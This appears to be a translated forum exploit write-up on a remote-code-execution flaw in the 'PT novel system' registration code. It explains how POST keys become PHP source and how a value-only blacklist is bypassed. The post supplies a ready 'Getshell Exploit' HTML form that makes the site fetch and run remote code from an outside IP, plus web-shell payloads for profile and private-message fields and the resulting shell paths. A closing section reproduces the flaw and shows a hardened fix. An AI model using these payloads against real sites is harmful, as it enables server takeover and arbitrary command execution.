PT novel system getshell (the vendor has already released an official patch! Damn!)

Let's get right into it. This program uses no database: all user information is stored under the /data/user directory. A folder is created per username, and the registration parameters and user information are written into that folder.

I won't go through the other files that do this, since they are all similar; we only look at one representative:

/user/reg4.php
if (isset($_POST['dosubmit'])) {
    unset($_POST['dosubmit']);
} else {
    echo "<script>alert('Incorrect route!');location.href='reg.php';</script>";
    exit();
}
include '../inc/global.php';
include '../data/user.php';
$username = $_POST['username'];

// write data: every remaining POST key and value is interpolated into PHP source
$str = '<?php' . "\n";
foreach ($_POST as $key => $value) {
    $str .= "\$$key = '$value';\n";
}
$str .= "\$regdate = '" . date("Y-m-d") . "';\n";
$str .= "?>";
$file = '../data/user/' . $username . '/info.php';
$result = $pt->writeto($file, $str);

...... omitted
The code above keeps only the most critical part. Then we see our lovely foreach: it puts the POST keys and values straight into the PHP source string and hands it to the writeto function. Let's check that code:
common.class.php

// generate html
function writeto($filePath, $content) {
    pt::createdir(dirname($filePath));
    $pt_html = fopen($filePath, 'w');
    flock($pt_html, LOCK_EX);
    $result = fwrite($pt_html, $content);
    fclose($pt_html);
    return $result;
}

// generate directory
function createdir($dir) {
    // note: strpos() takes (haystack, needle), so with the arguments in this order the
    // check is never true and backslash paths are left as they are
    if (strpos('\\', $dir)) {
        $dir = str_replace('\\', '/', $dir);
    }
    $edir = explode("/", $dir);
    for ($i = 0; $i < count($edir); $i++) {
        $edirm = $edir[0];
        for ($ii = 1; $ii <= $i; $ii++) {
            $edirm = $edirm . '/' . $edir[$ii];
        }
        if (!(file_exists($edirm) && is_dir($edirm))) {
            @mkdir($edirm, 0777);
        }
    }
}
It's amazing: it writes a PHP file directly. OK, let's look at how to use it.
First, we can set the path aside: this file has no filtering of its own. Let's look at the file it includes, global.php:
// prevent invalid POST
if (!empty($_REQUEST)) {
    $value = implode("", $_REQUEST);
    if (preg_match("/\{|\}|fputs|fopen|base64|eval/i", $value)) { // a keyword was added here in the patch; of course the vendor never discovered that this can be bypassed!
        exit('Invalid operation');
    }
}
Unrelated code omitted. As you can see, the global filter is simple and easy to bypass: implode() joins only the values of $_REQUEST, so parameter names are never checked at all, and neither assert nor file_get_contents is on the keyword list.
Let's take a look at my EXP:

<title>PT novel system Getshell Exploit by cfking</title>
<form id="QuickSearch" action="" method="post" name="QuickSearch" onsubmit="addaction();">
Target address: <input style="width: 400;" type="text" name="doaction" value="http://localhost/user/reg4.php"/>
<input style="width: 400;" type="hidden" name="dosubmit" value="test"/>
Registered account: <input style="width: 400;" type="text" name="username" value="cfking"/>
Remote code: <input style="width: 400;" type="text" name="url" value="http://110.110.110.110/xx.txt"/>
<input style="width: 400;" type="hidden" name="exp;assert(file_get_contents($url));//"/>
<input type="submit" name="QuickSearchBtn" value="submit" style="font-size: 16px;"/>
</form>
<script type="text/javascript">
function addaction()
{
    document.QuickSearch.action = document.QuickSearch.doaction.value;
}
</script>
<hr><p>Tip: once the getshell succeeds, the shell is at /data/user/USERNAME/info.php. Too easy! Roar!</p>
<p>Put eval($_POST[cmd]); in the remote TXT file.</p>
Another method:
After registering an account, insert the following anywhere you can edit your personal data:
'?><?php assert($_POST[cmd]);?><?php'
The shell path is again /data/user/USERNAME/info.php.
However, this fails if magic_quotes_gpc is on, because the single quote gets escaped. So I went looking for another one!
Sending a private message: write the following into the title or the content,
<?php assert($_POST[cmd]);?>
and you get a shell directly.
Address: pm.php
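As an added example (not code from the PT novel system or from the original post), the following PHP script reproduces, on a constructed request, the three pieces this post relies on: a reg4.php-style generator that interpolates every POST key and value into PHP source, the global.php blacklist that inspects only the imploded values, and the two injection shapes used above (code in a parameter name, as in the EXP, and a quote breakout in a field value, as in the profile and PM methods). It then shows a hardened generator for comparison. The function names (vuln_generate, filter_blocks, safe_generate), the 'sign' profile field and the field whitelist are assumptions made for the illustration.

```php
<?php
// Added example, not part of the PT novel system or the original post.
// Function names, the 'sign' field and the whitelist below are hypothetical.
// Run with: php example.php

// Constructed request modelled on the exploit form. The array is built directly
// because PHP rewrites spaces and dots in real parameter names to '_', so a real
// request must use a key without spaces, as the EXP does.
$post = [
    'username' => 'cfking',
    'url'      => 'http://110.110.110.110/xx.txt',
    "exp;assert(file_get_contents(\$url));//" => '',        // code in the parameter NAME
    'sign'     => "'?><?php assert(\$_POST[cmd]);?><?php'", // quote breakout in a VALUE
];

// 1. The original generator: keys and values go straight into PHP source.
function vuln_generate(array $post): string {
    $str = '<?php' . "\n";
    foreach ($post as $key => $value) {
        $str .= "\$$key = '$value';\n";
    }
    $str .= "\$regdate = '" . date('Y-m-d') . "';\n?>";
    return $str;
}

// 2. The global.php check: implode() joins VALUES only; keys are never inspected,
//    and assert/file_get_contents are not on the list.
function filter_blocks(array $request): bool {
    $value = implode('', $request);
    return (bool) preg_match('/\{|\}|fputs|fopen|base64|eval/i', $value);
}

// 3. Hardened generator: whitelist the keys, validate the path component, and
//    never interpolate raw user strings into code.
function safe_generate(array $post): string {
    $allowed = ['username', 'email', 'sign']; // hypothetical field whitelist
    $data = [];
    foreach ($allowed as $key) {
        if (isset($post[$key]) && is_string($post[$key])) {
            $data[$key] = $post[$key];
        }
    }
    // the username becomes a directory name, so restrict it to a safe charset
    if (!isset($data['username']) || !preg_match('/^[A-Za-z0-9_]{3,20}$/', $data['username'])) {
        throw new InvalidArgumentException('bad username');
    }
    $data['regdate'] = date('Y-m-d');
    // var_export() emits a PHP literal with quotes and backslashes escaped, so a
    // stored value can never become code. Storing JSON instead of PHP is better still.
    return '<?php' . "\n" . 'return ' . var_export($data, true) . ";\n";
}

echo "blacklist fires: " . (filter_blocks($post) ? 'yes' : 'no') . "\n\n";
echo "--- vulnerable info.php ---\n" . vuln_generate($post) . "\n\n";
echo "--- hardened info.php ---\n" . safe_generate($post) . "\n";
```

Running it prints "blacklist fires: no", then the vulnerable file, in which the injected key appears as an executable statement ($exp;assert(file_get_contents($url));// = '';) and the 'sign' value closes its quotes and opens a new PHP block, and finally the hardened file, where the hostile key is simply never written and var_export() has escaped the quotes in 'sign'. The generator also shows why the blacklist gives a false sense of safety: it never saw the parameter name in the first place.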
Patch officially released